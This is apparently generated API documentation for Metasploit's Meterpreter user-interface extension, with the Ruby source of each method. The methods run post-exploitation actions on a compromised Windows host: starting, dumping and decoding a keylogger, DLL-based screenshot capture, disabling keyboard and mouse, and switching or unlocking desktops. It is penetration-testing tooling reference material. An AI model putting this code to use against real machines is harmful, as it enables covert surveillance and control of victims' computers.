Class: Rex::Post::Meterpreter::Extensions::Stdapi::UI

Inherits:
UI
  • Object
show all
Includes:
ObjectAliasesContainer
Defined in:
lib/rex/post/meterpreter/extensions/stdapi/ui.rb

Overview

Allows for interacting with the user interface on the remote machine, such as by disabling the keyboard and mouse.

WARNING:

Using keyboard and mouse enabling/disabling features will result in a DLL file being written to disk.

Instance Attribute Summary

Attributes included from ObjectAliasesContainer

#aliases

Instance Method Summary collapse

Methods included from ObjectAliasesContainer

#dump_alias_tree, #initialize_aliases, #method_missing

Constructor Details

#initialize(client) ⇒ UI

Initializes the post-exploitation user-interface manipulation subsystem.



36
37
38
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 36

def initialize(client)
	self.client = client
end

Dynamic Method Handling

This class handles dynamic methods through the method_missing method in the class Rex::Post::Meterpreter::ObjectAliasesContainer

Instance Method Details

#disable_keyboardObject

Disable keyboard input on the remote machine.



49
50
51
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 49

def disable_keyboard
	return enable_keyboard(false)
end

#disable_mouseObject

Disable mouse input on the remote machine.



69
70
71
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 69

def disable_mouse
	return enable_mouse(false)
end

#enable_keyboard(enable = true) ⇒ Object

Enable keyboard input on the remote machine.



56
57
58
59
60
61
62
63
64
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 56

def enable_keyboard(enable = true)
	request = Packet.create_request('stdapi_ui_enable_keyboard')

	request.add_tlv(TLV_TYPE_BOOL, enable)

	response = client.send_request(request)

	return true
end

#enable_mouse(enable = true) ⇒ Object

Enable mouse input on the remote machine.



76
77
78
79
80
81
82
83
84
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 76

def enable_mouse(enable = true)
	request = Packet.create_request('stdapi_ui_enable_mouse')

	request.add_tlv(TLV_TYPE_BOOL, enable)

	response = client.send_request(request)

	return true
end

#enum_desktopsObject

Enumerate desktops.



101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 101

def enum_desktops
	request  = Packet.create_request('stdapi_ui_desktop_enum')
	response = client.send_request(request)
	desktopz = []
	if( response.result == 0 )
		response.each( TLV_TYPE_DESKTOP ) { | desktop |
		desktopz << {
				'session' => desktop.get_tlv_value( TLV_TYPE_DESKTOP_SESSION ),
				'station' => desktop.get_tlv_value( TLV_TYPE_DESKTOP_STATION ),
				'name'    => desktop.get_tlv_value( TLV_TYPE_DESKTOP_NAME )
			}
		}
	end
	return desktopz
end

#get_desktopObject

Get the current desktop meterpreter is using.



120
121
122
123
124
125
126
127
128
129
130
131
132
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 120

def get_desktop
	request  = Packet.create_request( 'stdapi_ui_desktop_get' )
	response = client.send_request( request )
	desktop  = {}
	if( response.result == 0 )
		desktop = {
				'session' => response.get_tlv_value( TLV_TYPE_DESKTOP_SESSION ),
				'station' => response.get_tlv_value( TLV_TYPE_DESKTOP_STATION ),
				'name'    => response.get_tlv_value( TLV_TYPE_DESKTOP_NAME )
			}
	end
	return desktop
end

#idle_timeObject

Returns the number of seconds the remote machine has been idle from user input.



90
91
92
93
94
95
96
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 90

def idle_time
	request = Packet.create_request('stdapi_ui_get_idle_time')

	response = client.send_request(request)

	return response.get_tlv_value(TLV_TYPE_IDLE_TIME);
end

#keyscan_dumpObject

Dump the keystroke buffer



217
218
219
220
221
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 217

def keyscan_dump
	request  = Packet.create_request('stdapi_ui_get_keys')
	response = client.send_request(request)
	return response.get_tlv_value(TLV_TYPE_KEYS_DUMP);
end

#keyscan_extract(buffer_data) ⇒ Object

Extract the keystroke from the buffer data



226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 226

def keyscan_extract(buffer_data)
	outp = ""
	buffer_data.unpack("n*").each do |inp|
		fl = (inp & 0xff00) >> 8
		vk = (inp & 0xff)
		kc = VirtualKeyCodes[vk]

		f_shift = fl & (1<<1)
		f_ctrl  = fl & (1<<2)
		f_alt   = fl & (1<<3)

		if(kc)
			name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
			case name
			when /^.$/
				outp << name
			when /shift|click/i
			when 'Space'
				outp << " "
			else
				outp << " <#{name}> "
			end
		else
			outp << " <0x%.2x> " % vk
		end
	end
	return outp
end

#keyscan_startObject

Start the keyboard sniffer



199
200
201
202
203
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 199

def keyscan_start
	request  = Packet.create_request('stdapi_ui_start_keyscan')
	response = client.send_request(request)
	return true
end

#keyscan_stopObject

Stop the keyboard sniffer



208
209
210
211
212
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 208

def keyscan_stop
	request  = Packet.create_request('stdapi_ui_stop_keyscan')
	response = client.send_request(request)
	return true
end

#screenshot(quality = 50) ⇒ Object

Grab a screenshot of the interactive desktop



155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 155

def screenshot( quality=50 )
	request = Packet.create_request( 'stdapi_ui_desktop_screenshot' )
	request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )
	# include the x64 screenshot dll if the host OS is x64
	if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
		screenshot_path = ::File.join( Msf::Config.install_root, 'data', 'meterpreter', 'screenshot.x64.dll' )
		screenshot_path = ::File.expand_path( screenshot_path )
		screenshot_dll  = ''
		::File.open( screenshot_path, 'rb' ) do |f|
			screenshot_dll += f.read( f.stat.size )
		end
		request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, screenshot_dll, false, true )
		request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
	end
	# but allways include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
	screenshot_path = ::File.join( Msf::Config.install_root, 'data', 'meterpreter', 'screenshot.dll' )
	screenshot_path = ::File.expand_path( screenshot_path )
	screenshot_dll  = ''
	::File.open( screenshot_path, 'rb' ) do |f|
		screenshot_dll += f.read( f.stat.size )
	end
	request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER, screenshot_dll, false, true )
	request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH, screenshot_dll.length )
	# send the request and return the jpeg image if successfull.
	response = client.send_request( request )
	if( response.result == 0 )
		return response.get_tlv_value( TLV_TYPE_DESKTOP_SCREENSHOT )
	end
	return nil
end

#set_desktop(session = -1,, station = 'WinSta0', name = 'Default', switch = false) ⇒ Object

Change the meterpreters current desktop. The switch param sets this new desktop as the interactive one (The local users visible desktop with screen/keyboard/mouse control).



139
140
141
142
143
144
145
146
147
148
149
150
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 139

def set_desktop( session=-1, station='WinSta0', name='Default', switch=false )
	request  = Packet.create_request( 'stdapi_ui_desktop_set' )
	request.add_tlv( TLV_TYPE_DESKTOP_SESSION, session )
	request.add_tlv( TLV_TYPE_DESKTOP_STATION, station )
	request.add_tlv( TLV_TYPE_DESKTOP_NAME, name )
	request.add_tlv( TLV_TYPE_DESKTOP_SWITCH, switch )
	response = client.send_request( request )
	if( response.result == 0 )
		return true
	end
	return false
end

#unlock_desktop(unlock = true) ⇒ Object

Unlock or lock the desktop



189
190
191
192
193
194
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 189

def unlock_desktop(unlock=true)
	request  = Packet.create_request('stdapi_ui_unlock_desktop')
	request.add_tlv(TLV_TYPE_BOOL, unlock)
	response = client.send_request(request)
	return true
end